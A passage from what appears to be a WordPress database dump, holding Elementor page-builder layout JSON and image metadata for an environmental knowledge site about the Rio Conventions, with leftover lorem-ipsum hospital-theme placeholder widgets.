#4\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3069,395,'_elementor_version','2.7.5'),(3070,395,'_elementor_template_type','wp-page'),(3073,396,'_wp_attached_file','2019/11/featured_forest_biodiversity.jpg'),(3074,396,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:544;s:4:\"file\";s:40:\"2019/11/featured_forest_biodiversity.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"featured_forest_biodiversity-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"featured_forest_biodiversity-300x159.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"featured_forest_biodiversity-768x408.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"featured_forest_biodiversity-1024x544.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:544;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCE-3000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1487260799\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"210\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3082,398,'_wp_page_template','default'),(3083,398,'_elementor_edit_mode','builder'),(3084,398,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"vmjwleh\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3a3bcf4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ho7i20h\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"xy8zxqm\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-heartbeat\",\"title_text\":\"Cardiac Rehab\",\"description_text\":\"Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ze0ehm9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"73ci3v0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"lb2mzdw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-medkit\",\"title_text\":\"Gynecology\",\"description_text\":\"Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ohhadxb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"w62h9z0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"1q7ujfs\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-stethoscope\",\"title_text\":\"Symptom Check\",\"description_text\":\"Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"vn30vxq\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"gcyn1zg\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"hnlb77z\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-clock-o\",\"title_text\":\"Rehabilitation\",\"description_text\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"f41bjy0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"xf3xggu\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"756a496\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"gjruaqu\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"dckxccw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-user-md\",\"title_text\":\"General Surgery\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"hx0bfps\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"98dsrav\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-hospital-o\",\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital\",\"position\":\"left\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"az3bsd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"p6fdudg\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-ambulance\",\"title_text\":\"Emergency Departments\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"right\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"qg9bbu9\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"ahzx2ew\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-wechat\",\"title_text\":\"24\\/7 Services\",\"description_text\":\"Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.\",\"position\":\"right\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"42yxmso\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#fcfcfc\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#eaeaea\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e898dc3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"iulpcd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"m7heks5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Reserve now in our hospital\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zq38c4y\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"9kdvz1o\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"y3vt4zr\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8088599\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1fhtv2k\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fnui4s\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_563214.jpg\",\"id\":144},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"hlxu9mu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Transplant Services\",\"description_text\":\"Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"k5ey6e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa 